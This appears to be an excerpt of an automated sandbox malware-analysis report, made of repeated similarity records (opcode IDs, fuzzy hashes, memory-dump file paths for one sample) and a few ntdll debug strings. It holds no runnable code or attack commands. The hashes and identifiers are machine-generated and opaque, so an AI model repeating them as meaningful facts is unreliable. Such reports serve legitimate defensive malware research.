                                                                                                                                                                                                                                  • Opcode ID: 7c4d38b269911c7a03312ac2b627142be385d87f08f8cc497e1f55f69322ebfa
                                                                                                                                                                                                                                  • Instruction ID: 7157bc354f4a67baa8cc1f6137dd75e7e195377c35dd17371341ed9d7db7e0fa
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7c4d38b269911c7a03312ac2b627142be385d87f08f8cc497e1f55f69322ebfa
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3FF0FA32200700ABDB319F4ACC04F9BBBEDEF94B04F08055EA542931A1C6B0E909C660
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 1b7835e4d6d6559359274cfa51e41153a2ed1920ea28c928af81b6d046f1638e
                                                                                                                                                                                                                                  • Instruction ID: 0b04690413c93293685ee681f2871e2d597982108830e7e28edcd153423223da
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b7835e4d6d6559359274cfa51e41153a2ed1920ea28c928af81b6d046f1638e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 00F0B472611204AFE715DB26CC05B96B7E9EFA8710F15847DA505DB270FAB1DD01CA28
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 35593d7a6d8296684b589a467feac125667eb3a4881b64576c6399c39bde8992
                                                                                                                                                                                                                                  • Instruction ID: daeb8637d21a7372522acfec06f9d5f36e75c31f279ae10bd35b04e49f7a2575
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 35593d7a6d8296684b589a467feac125667eb3a4881b64576c6399c39bde8992
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CFF0AF70A00208AFCB04EFA9C555E5EB7F4FF28200F00805AB811EB395DA78EA00CB50
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: ad7f2c1d191f622a4fdb81b8b58835b3e0427a808d3b1ce02635a69fae7dec0c
                                                                                                                                                                                                                                  • Instruction ID: 4a9f2a870bcf8fb0ef7c4caf0ed813110bb73bbf34c0954768a29e8b3a699bb1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ad7f2c1d191f622a4fdb81b8b58835b3e0427a808d3b1ce02635a69fae7dec0c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6DF062B1A00248EFDB44EFE9D455E9EB7F4BF18704F04445AA915EB291D674D900CB54
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 5322fdbab9055a87c5a3095e4aeeecbffa5a56799c7a54b1d51ea1e83cc2311e
                                                                                                                                                                                                                                  • Instruction ID: 0d7d8f12751ff306d5c23bf9f18bfb61fa1db18a7364e39be47c014aee023bc3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5322fdbab9055a87c5a3095e4aeeecbffa5a56799c7a54b1d51ea1e83cc2311e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E1F052B10212B08BEF22AB5CD0FCB637BD49B01A64F95802FD4068B332C330C880C2C0
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 2ed3d22eeff636eb0551a0025a211ec4f1b1c67496731614af6a82ea339e5be1
                                                                                                                                                                                                                                  • Instruction ID: f92395323c60e5e26ed205fab6a0335fadb82dfbd8177c3b376a05b819ff29f2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2ed3d22eeff636eb0551a0025a211ec4f1b1c67496731614af6a82ea339e5be1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5AE092323405412BE7129E5A8CD8F477B9E9FE2711F04447EB9055E261C9F29D0983A0
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 22c71c330febee40ccc0b95814ad2a0d3a12b18b046e67af341aaa18273b6a26
                                                                                                                                                                                                                                  • Instruction ID: b74a613bf08d19a38543d52e849becdfc69f80a30e6266e9efcef98516e236db
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 22c71c330febee40ccc0b95814ad2a0d3a12b18b046e67af341aaa18273b6a26
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 28F0EC329116A18FFB23E729C084B5A77D8BB40B71F099062D8288FA12C330DDC0C290
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 8e9fa51e7e1b6d9588dff33fd670d7304289360f3bbce20366863bc22512e599
                                                                                                                                                                                                                                  • Instruction ID: 76c2222d25ca5a9a05e3f43311c6473d219bfd70816077ac462920240b71ddb4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e9fa51e7e1b6d9588dff33fd670d7304289360f3bbce20366863bc22512e599
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E6F08270A10249AFDB04EBBAE55AE9E77F8AF18704F150499A501EF294EA74D9008754
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: bb3ac39a960e3386ac8f7dbeabfd123d07db521db4200fb7e757ea13b94bcc0a
                                                                                                                                                                                                                                  • Instruction ID: 0f06b3320171041d6b1904d657ed7b55cd7c3eaf8ae3630c6f08e35ef334dbc1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb3ac39a960e3386ac8f7dbeabfd123d07db521db4200fb7e757ea13b94bcc0a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EBF08271A00249AFDB04DBEAD86AE9E77F8AF18704F14009AE601EF290D974D900C718
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3DD022370D010CBBCB119F62CC01F903BA8E7A0B60F004020B504870A0CA3AE850C580
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
                                                                                                                                                                                                                                  • Instruction ID: e55c114a388d07aa987a9d59c2af24f49642a2bb70c18dbb9d7ae704eb2d4112
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 27D0C935312D80CFD71BCB0CC894B0633B4BB44B40F810490E901CB762D27CE980CA10
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                                                                                                                  • Instruction ID: 8ae3730bc4503684b29d2e4e612c98f840a9b114efb9f8be69ad0187bb02950e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47D0123A10024CEFCB01DF41C850D5A772BFFD8B10F10801DFD19076108A31ED62DA50
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 2cd7a0cba40542002f5a7f393242cee2f830ad860d51489f93f91c1395f24a2a
                                                                                                                                                                                                                                  • Instruction ID: a0317306738270a6615d7f7eddf56552aaf9b203cb729b274a0fb8c87abd5603
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2cd7a0cba40542002f5a7f393242cee2f830ad860d51489f93f91c1395f24a2a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 31C08C781412806AEF2B5F45C910B2A3E54BB10E05F84019DAE101D6B2C77AD8018208
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 8a14435bee7540e525d38aa954f86226da97dcba671ccc99f39765ef3f5e3a14
                                                                                                                                                                                                                                  • Instruction ID: cd8dd2b35396877d33600898afef2a723917b116507f96e3a563b71ab3637142
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8a14435bee7540e525d38aa954f86226da97dcba671ccc99f39765ef3f5e3a14
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD900231605401129940715859845464005A7E0311F51C41AE1414D65CCB3489566361
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 95d900868b098a258916286fcaf332eb5745cce425a94c6904131b75a4a1ea67
                                                                                                                                                                                                                                  • Instruction ID: 415b2d39a37d7eb44e673da0b35c6d00c0ba598bf1169dff46af253e0b25f2c3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 95d900868b098a258916286fcaf332eb5745cce425a94c6904131b75a4a1ea67
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DD900261601101424940715859044066005A7E1311791C51EA1544D71CC7388855A269
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 22974df918be47cbc1282f518e101828c5a46cdf7efba836e8983abbb27a776b
                                                                                                                                                                                                                                  • Instruction ID: 43ea9e1a8c7dc948bc825f0e0d1e807adb5dd47b4b5ff722193dbb535e64b538
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 22974df918be47cbc1282f518e101828c5a46cdf7efba836e8983abbb27a776b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F39002A1201141924D00A2589504B0A450597E0211F51C41FE2044D71CC6358851A135
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 8a39ac7419bb433bc6677b2b0fabe89775c873ca8235c854218fd9664712ada2
                                                                                                                                                                                                                                  • Instruction ID: 0c05ba57f63f603fbb0eecfd6522d3dec1e63eb6119f042d4a8a3466ac41b0c9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8a39ac7419bb433bc6677b2b0fabe89775c873ca8235c854218fd9664712ada2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1900225211001030905A5581704507004697D5361751C42AF2005D61CD73188616121
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 895143efe7c5fdb9acb64cb9497ec121526353cb994067d10cdd017e5209b84d
                                                                                                                                                                                                                                  • Instruction ID: e5b0b1982f159498c36b7bd1d91c87b0f7aa8d3dcf3d582af3b6ea8aba020b79
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 895143efe7c5fdb9acb64cb9497ec121526353cb994067d10cdd017e5209b84d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1790022124505202D950715C55046164005B7E0211F51C42AA1804DA5DC67588557221
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 4a061eec868e2fb8999ee7a316806b876dd7768ad386d16a21baf2f604245023
                                                                                                                                                                                                                                  • Instruction ID: b1c56074637aa58771954e0b1d469ff23be455fd6545fcdebc6430ade581f617
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4a061eec868e2fb8999ee7a316806b876dd7768ad386d16a21baf2f604245023
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D290023120504942D94071585504A46001597D0315F51C41AA1054EA5DD7358D55B661
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 20c726f245ab65b3bb553a5f5dfdccf24d329e1dce38a0cd15c612a0175bfa82
                                                                                                                                                                                                                                  • Instruction ID: 8a26109d614b3426e2185a9744be0519f521d832c419c3a76d41a14f9bff2994
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 20c726f245ab65b3bb553a5f5dfdccf24d329e1dce38a0cd15c612a0175bfa82
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F90023120100503D90061586608707000597D0211F51D81AA1414D69DD77688517121
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: a3335be9edbc3a44754eae069efbb917657a5e1dbedb99333e8dd5aabc9e7925
                                                                                                                                                                                                                                  • Instruction ID: 607534814b505ac157195d310a48cda614f0d7bc2a889061751d33b2cc646679
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a3335be9edbc3a44754eae069efbb917657a5e1dbedb99333e8dd5aabc9e7925
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AE90022120504542D90065586508A06000597D0215F51D41AA2054DA6DC7358851B131
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: b7ef28ed348e164e645eda7bc12cc9f12783ddc83cff31672c10345d060c49fe
                                                                                                                                                                                                                                  • Instruction ID: 0084d721db31886d5eb412c5f10f0f1911a50fbc6a7f672cf9d61e6484c547bc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b7ef28ed348e164e645eda7bc12cc9f12783ddc83cff31672c10345d060c49fe
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0490022921300102D9807158650860A000597D1212F91D81EA1005D69CCA3588696321
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 4f6e25f1460cd1277c9e6d9eabb31884bfd522349ff0b71910902886ca6d14b3
                                                                                                                                                                                                                                  • Instruction ID: bc1569871230f4d9e79e724010e8fd504c80de3ff1553caa69de9ff07d991c77
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f6e25f1460cd1277c9e6d9eabb31884bfd522349ff0b71910902886ca6d14b3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47900231202002429D4062586904A4E410597E1312F91D81EA1005D65CCA3488616221
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: f17b9e02dc30b971955317bc4c0fa7ceedc4341f58eb9d28bd6ccb1e084522cc
                                                                                                                                                                                                                                  • Instruction ID: f35e5a5c3d4c15c2f8e4108ed0e86b75954c2a6d096443d289890f2a3f95d562
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f17b9e02dc30b971955317bc4c0fa7ceedc4341f58eb9d28bd6ccb1e084522cc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2990023124100502D941715855046060009A7D0251F91C41BA1414D65EC7758A56BA61
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: ac1b574d76a97369c815887534d54f59fa8e5eeeae82abb8fd57ac558194c1f2
                                                                                                                                                                                                                                  • Instruction ID: beb58f541151f5a6c006e820d47fe997588811d3fbef2601590ef90ae5248181
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ac1b574d76a97369c815887534d54f59fa8e5eeeae82abb8fd57ac558194c1f2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9900221242042525D45B15855045074006A7E0251B91C41BA2404D61CC6369856E621
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: b951bb59d84546fbc4c11204b29d2bab161d128563a045477792d5853e3a3d07
                                                                                                                                                                                                                                  • Instruction ID: bc5812e2a085c5e547da63083f0bd1f656820e7d82c34ae27c5ac3b63a647b36
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b951bb59d84546fbc4c11204b29d2bab161d128563a045477792d5853e3a3d07
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1590023520100502DD1061586904646004697D0311F51D81AA1414D69DC77488A1B121
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: e77e14ee95f27d5ddcbb64723b5a779ed0d1638aeedeffc14bae9b1b67835134
                                                                                                                                                                                                                                  • Instruction ID: 8860d3bf82b3e206d11f3b6bcd0379a1b9187998875328f6fb640b18900b893c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e77e14ee95f27d5ddcbb64723b5a779ed0d1638aeedeffc14bae9b1b67835134
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D790022121180142DA0065685D14B07000597D0313F51C51EA1144D65CCA3588616521
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0151454D
                                                                                                                                                                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01514507
                                                                                                                                                                                                                                  • Execute=1, xrefs: 0151451E
